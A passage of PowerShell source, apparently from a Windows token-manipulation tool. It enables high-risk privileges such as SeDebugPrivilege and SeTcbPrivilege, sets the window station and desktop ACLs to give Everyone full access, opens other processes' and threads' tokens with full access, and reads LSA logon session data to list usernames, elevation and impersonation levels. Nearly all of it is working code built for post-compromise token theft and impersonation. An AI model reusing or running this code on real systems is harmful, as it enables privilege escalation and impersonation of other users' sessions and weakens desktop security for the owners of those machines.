$LocalFreeAddr = Get-ProcAddress kernel32.dll LocalFree\n    $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n    $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)\n\n    $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW\n    $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate)\n    ###############################\n\n\n    #Used to add 64bit memory addresses\n    Function Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\n\n    #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL\n    function Enable-SeAssignPrimaryTokenPrivilege\n    {\t\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, \"SeAssignPrimaryTokenPrivilege\", [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n    }\n\n\n    #Enable SeSecurityPrivilege, needed to query security information for desktop DACL\n    function Enable-Privilege\n    {\n        Param(\n            [Parameter()]\n            [ValidateSet(\"SeAssignPrimaryTokenPrivilege\", \"SeAuditPrivilege\", \"SeBackupPrivilege\", \"SeChangeNotifyPrivilege\", \"SeCreateGlobalPrivilege\",\n                \"SeCreatePagefilePrivilege\", \"SeCreatePermanentPrivilege\", \"SeCreateSymbolicLinkPrivilege\", \"SeCreateTokenPrivilege\",\n                \"SeDebugPrivilege\", \"SeEnableDelegationPrivilege\", \"SeImpersonatePrivilege\", \"SeIncreaseBasePriorityPrivilege\",\n                \"SeIncreaseQuotaPrivilege\", \"SeIncreaseWorkingSetPrivilege\", \"SeLoadDriverPrivilege\", \"SeLockMemoryPrivilege\", \"SeMachineAccountPrivilege\",\n                \"SeManageVolumePrivilege\", \"SeProfileSingleProcessPrivilege\", \"SeRelabelPrivilege\", \"SeRemoteShutdownPrivilege\", \"SeRestorePrivilege\",\n                \"SeSecurityPrivilege\", \"SeShutdownPrivilege\", \"SeSyncAgentPrivilege\", \"SeSystemEnvironmentPrivilege\", \"SeSystemProfilePrivilege\",\n                \"SeSystemtimePrivilege\", \"SeTakeOwnershipPrivilege\", \"SeTcbPrivilege\", \"SeTimeZonePrivilege\", \"SeTrustedCredManAccessPrivilege\",\n                \"SeUndockPrivilege\", \"SeUnsolicitedInputPrivilege\")]\n            [String]\n            $Privilege\n        )\n\n\t    [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke()\n\t    if ($ThreadHandle -eq [IntPtr]::Zero)\n\t    {\n\t\t    Throw \"Unable to get the handle to the current thread\"\n\t    }\n\t\t\n\t    [IntPtr]$ThreadToken = [IntPtr]::Zero\n\t    [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t    {\n\t\t\t    $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t\t\t\n\t\t\t    $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t    if ($Result -eq $false)\n\t\t\t    {\n\t\t\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t\t\t    }\n\t\t    }\n\t\t    else\n\t\t    {\n\t\t\t    Throw ([ComponentModel.Win32Exception] $ErrorCode)\n\t\t    }\n\t    }\n\n        $CloseHandle.Invoke($ThreadHandle) | Out-Null\n\t\n        $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID)\n        $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize)\n        $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr)\n\n\t    $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject)\n\n\t    if ($Result -eq $false)\n\t    {\n\t\t    Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES)\n        $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize)\n        $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr)\n\n        $LuidAndAttributes.Luid = $LuidObject\n        $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES)\n        $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES)\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr)\n\t    $TokenPrivileges.PrivilegeCount = 1\n\t    $TokenPrivileges.Privileges = $LuidAndAttributes\n\n        $Global:TokenPriv = $TokenPrivileges\n\n        Write-Verbose \"Attempting to enable privilege: $Privilege\"\n\t    $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t    if ($Result -eq $false)\n\t    {\n            Throw (New-Object ComponentModel.Win32Exception)\n\t    }\n\n        $CloseHandle.Invoke($ThreadToken) | Out-Null\n        Write-Verbose \"Enabled privilege: $Privilege\"\n    }\n\n\n    #Change the ACL of the WindowStation and Desktop\n    function Set-DesktopACLs\n    {\n        Enable-Privilege -Privilege SeSecurityPrivilege\n\n        #Change the privilege for the current window station to allow full privilege for all users\n        $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni(\"WinSta0\")\n        $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC)\n\n        if ($hWinsta -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hWinsta\n        $CloseHandle.Invoke($hWinsta) | Out-Null\n\n        #Change the privilege for the current desktop to allow full privilege for all users\n        $hDesktop = $OpenDesktopA.Invoke(\"default\", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC)\n        if ($hDesktop -eq [IntPtr]::Zero)\n        {\n            Throw (New-Object ComponentModel.Win32Exception)\n        }\n\n        Set-DesktopACLToAllowEveryone -hObject $hDesktop\n        $CloseHandle.Invoke($hDesktop) | Out-Null\n    }\n\n\n    function Set-DesktopACLToAllowEveryone\n    {\n        Param(\n            [IntPtr]$hObject\n            )\n\n        [IntPtr]$ppSidOwner = [IntPtr]::Zero\n        [IntPtr]$ppsidGroup = [IntPtr]::Zero\n        [IntPtr]$ppDacl = [IntPtr]::Zero\n        [IntPtr]$ppSacl = [IntPtr]::Zero\n        [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero\n        #0x7 is window station, change for other types\n        $retVal = $GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor)\n        if ($retVal -ne 0)\n        {\n            Write-Error \"Unable to call GetSecurityInfo. ErrorCode: $retVal\"\n        }\n\n        if ($ppDacl -ne [IntPtr]::Zero)\n        {\n            $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL)\n\n            #Add all users to acl\n            [UInt32]$RealSize = 2000\n            $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize)\n            $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize)\n            if (-not $Success)\n            {\n                Throw (New-Object ComponentModel.Win32Exception)\n            }\n\n            #For user \"Everyone\"\n            $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE)\n            $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize)\n            $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr)\n            $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero\n            $TrusteeObj.MultipleTrusteeOperation = 0\n            $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID\n            $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP\n            $TrusteeObj.ptstrName = $pAllUsersSid\n\n            #Give full permission\n            $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS)\n            $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize)\n            $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS)\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr)\n            $ExplicitAccess.grfAccessPermissions = 0xf03ff\n            $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS\n            $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE\n            $ExplicitAccess.Trustee = $TrusteeObj\n\n            [IntPtr]$NewDacl = [IntPtr]::Zero\n\n            $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"Error calling SetEntriesInAclW: $RetVal\"\n            }\n\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid)\n\n            if ($NewDacl -eq [IntPtr]::Zero)\n            {\n                throw \"New DACL is null\"\n            }\n\n            #0x7 is window station, change for other types\n            $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl)\n            if ($RetVal -ne 0)\n            {\n                Write-Error \"SetSecurityInfo failed. Return value: $RetVal\"\n            }\n\n            $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null\n        }\n    }\n\n\n    #Get the primary token for the specified processId\n    function Get-PrimaryToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ProcessId,\n\n            #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM.\n            [Parameter()]\n            [Switch]\n            $FullPrivs\n        )\n\n        if ($FullPrivs)\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n        }\n        else\n        {\n            $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY \n        }\n\n        $ReturnStruct = New-Object PSObject\n\n        $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId)\n        $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess\n        if ($hProcess -eq [IntPtr]::Zero)\n        {\n            #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes.\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Verbose \"Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process.\"\n            return $null\n        }\n        else\n        {\n            [IntPtr]$hProcToken = [IntPtr]::Zero\n            $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken)\n\n            #Close the handle to hProcess (the process handle)\n            if (-not $CloseHandle.Invoke($hProcess))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hProcess = [IntPtr]::Zero\n\n            if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode\"\n                return $null\n            }\n            else\n            {\n                $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken\n            }\n        }\n\n        return $ReturnStruct\n    }\n\n\n    function Get-ThreadToken\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [UInt32]\n            $ThreadId\n        )\n\n        $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS\n\n        $RetStruct = New-Object PSObject\n        [IntPtr]$hThreadToken = [IntPtr]::Zero\n\n        $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId)\n        if ($hThread -eq [IntPtr]::Zero)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists\n            {\n                Write-Warning \"Failed to open thread handle for ThreadId: $ThreadId. Error code: $ErrorCode\"\n            }\n        }\n        else\n        {\n            $Success = $OpenThreadToken.Invoke($hThread, $TokenPrivs, $false, [Ref]$hThreadToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                if (($ErrorCode -ne $Win32Constants.ERROR_NO_TOKEN) -and  #This error is returned when the thread isn't impersonated\n                 ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER)) #Probably means the thread was closed\n                {\n                    Write-Warning \"Failed to call OpenThreadToken for ThreadId: $ThreadId. Error code: $ErrorCode\"\n                }\n            }\n            else\n            {\n                Write-Verbose \"Successfully queried thread token\"\n            }\n\n            #Close the handle to hThread (the thread handle)\n            if (-not $CloseHandle.Invoke($hThread))\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"Failed to close thread handle, this is unexpected. ErrorCode: $ErrorCode\"\n            }\n            $hThread = [IntPtr]::Zero\n        }\n\n        $RetStruct | Add-Member -MemberType NoteProperty -Name hThreadToken -Value $hThreadToken\n        return $RetStruct\n    }\n\n\n    #Gets important information about the token such as the logon type associated with the logon\n    function Get-TokenInformation\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [IntPtr]\n            $hToken\n        )\n\n        $ReturnObj = $null\n\n        $TokenStatsSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_STATISTICS)\n        [IntPtr]$TokenStatsPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenStatsSize)\n        [UInt32]$RealSize = 0\n        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenStatistics, $TokenStatsPtr, $TokenStatsSize, [Ref]$RealSize)\n        if (-not $Success)\n        {\n            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            Write-Warning \"GetTokenInformation failed. Error code: $ErrorCode\"\n        }\n        else\n        {\n            $TokenStats = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenStatsPtr, [Type]$TOKEN_STATISTICS)\n\n            #Query LSA to determine what the logontype of the session is that the token corrosponds to, as well as the username/domain of the logon\n            $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID))\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenStats.AuthenticationId, $LuidPtr, $false)\n\n            [IntPtr]$LogonSessionDataPtr = [IntPtr]::Zero\n            $ReturnVal = $LsaGetLogonSessionData.Invoke($LuidPtr, [Ref]$LogonSessionDataPtr)\n            if ($ReturnVal -ne 0 -and $LogonSessionDataPtr -eq [IntPtr]::Zero)\n            {\n                Write-Warning \"Call to LsaGetLogonSessionData failed. Error code: $ReturnVal. LogonSessionDataPtr = $LogonSessionDataPtr\"\n            }\n            else\n            {\n                $LogonSessionData = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LogonSessionDataPtr, [Type]$SECURITY_LOGON_SESSION_DATA)\n                if ($LogonSessionData.Username.Buffer -ne [IntPtr]::Zero -and \n                    $LogonSessionData.LoginDomain.Buffer -ne [IntPtr]::Zero)\n                {\n                    #Get the username and domainname associated with the token\n                    $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.Username.Buffer, $LogonSessionData.Username.Length/2)\n                    $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($LogonSessionData.LoginDomain.Buffer, $LogonSessionData.LoginDomain.Length/2)\n\n                    #If UserName is for the computer account, figure out what account it actually is (SYSTEM, NETWORK SERVICE)\n                    #Only do this for the computer account because other accounts return correctly. Also, doing this for a domain account \n                    #results in querying the domain controller which is unwanted.\n                    if ($Username -ieq \"$($env:COMPUTERNAME)`$\")\n                    {\n                        [UInt32]$Size = 100\n                        [UInt32]$NumUsernameChar = $Size / 2\n                        [UInt32]$NumDomainChar = $Size / 2\n                        [UInt32]$SidNameUse = 0\n                        $UsernameBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $DomainBuffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($Size)\n                        $Success = $LookupAccountSidW.Invoke([IntPtr]::Zero, $LogonSessionData.Sid, $UsernameBuffer, [Ref]$NumUsernameChar, $DomainBuffer, [Ref]$NumDomainChar, [Ref]$SidNameUse)\n\n                        if ($Success)\n                        {\n                            $Username = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($UsernameBuffer)\n                            $Domain = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($DomainBuffer)\n                        }\n                        else\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"Error calling LookupAccountSidW. Error code: $ErrorCode\"\n                        }\n\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UsernameBuffer)\n                        $UsernameBuffer = [IntPtr]::Zero\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($DomainBuffer)\n                        $DomainBuffer = [IntPtr]::Zero\n                    }\n\n                    $ReturnObj = New-Object PSObject\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Domain -Value $Domain\n                    $ReturnObj | Add-Member -Type NoteProperty -Name Username -Value $Username    \n                    $ReturnObj | Add-Member -Type NoteProperty -Name hToken -Value $hToken\n                    $ReturnObj | Add-Member -Type NoteProperty -Name LogonType -Value $LogonSessionData.LogonType\n\n\n                    #Query additional info about the token such as if it is elevated\n                    $ReturnObj | Add-Member -Type NoteProperty -Name IsElevated -Value $false\n\n                    $TokenElevationSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_ELEVATION)\n                    $TokenElevationPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenElevationSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenElevation, $TokenElevationPtr, $TokenElevationSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenElevation status. ErrorCode: $ErrorCode\" \n                    }\n                    else\n                    {\n                        $TokenElevation = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenelevationPtr, [Type]$TOKEN_ELEVATION)\n                        if ($TokenElevation.TokenIsElevated -ne 0)\n                        {\n                            $ReturnObj.IsElevated = $true\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenElevationPtr)\n\n\n                    #Query the token type to determine if the token is a primary or impersonation token\n                    $ReturnObj | Add-Member -Type NoteProperty -Name TokenType -Value \"UnableToRetrieve\"\n\n                    [UInt32]$TokenTypeSize = 4\n                    [IntPtr]$TokenTypePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenTypeSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenType, $TokenTypePtr, $TokenTypeSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenType = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenTypePtr, [Type][UInt32])\n                        switch($TokenType)\n                        {\n                            1 {$ReturnObj.TokenType = \"Primary\"}\n                            2 {$ReturnObj.TokenType = \"Impersonation\"}\n                        }\n                    }\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenTypePtr)\n\n\n                    #Query the impersonation level if the token is an Impersonation token\n                    if ($ReturnObj.TokenType -ieq \"Impersonation\")\n                    {\n                        $ReturnObj | Add-Member -Type NoteProperty -Name ImpersonationLevel -Value \"UnableToRetrieve\"\n\n                        [UInt32]$ImpersonationLevelSize = 4\n                        [IntPtr]$ImpersonationLevelPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ImpersonationLevelSize) #sizeof uint32\n                        [UInt32]$RealSize = 0\n                        $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenImpersonationLevel, $ImpersonationLevelPtr, $ImpersonationLevelSize, [Ref]$RealSize)\n                        if (-not $Success)\n                        {\n                            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                            Write-Warning \"GetTokenInformation failed to retrieve TokenImpersonationLevel status. ErrorCode: $ErrorCode\"\n                        }\n                        else\n                        {\n                            [UInt32]$ImpersonationLevel = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImpersonationLevelPtr, [Type][UInt32])\n                            switch ($ImpersonationLevel)\n                            {\n                                0 { $ReturnObj.ImpersonationLevel = \"SecurityAnonymous\" }\n                                1 { $ReturnObj.ImpersonationLevel = \"SecurityIdentification\" }\n                                2 { $ReturnObj.ImpersonationLevel = \"SecurityImpersonation\" }\n                                3 { $ReturnObj.ImpersonationLevel = \"SecurityDelegation\" }\n                            }\n                        }\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ImpersonationLevelPtr)\n                    }\n\n\n                    #Query the token sessionid\n                    $ReturnObj | Add-Member -Type NoteProperty -Name SessionID -Value \"Unknown\"\n\n                    [UInt32]$TokenSessionIdSize = 4\n                    [IntPtr]$TokenSessionIdPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenSessionIdSize)\n                    [UInt32]$RealSize = 0\n                    $Success = $GetTokenInformation.Invoke($hToken, $TOKEN_INFORMATION_CLASS::TokenSessionId, $TokenSessionIdPtr, $TokenSessionIdSize, [Ref]$RealSize)\n                    if (-not $Success)\n                    {\n                        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                        Write-Warning \"GetTokenInformation failed to retrieve Token SessionId. ErrorCode: $ErrorCode\"\n                    }\n                    else\n                    {\n                        [UInt32]$TokenSessionId = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenSessionIdPtr, [Type][UInt32])\n                        $ReturnObj.SessionID = $TokenSessionId\n                    }\n                    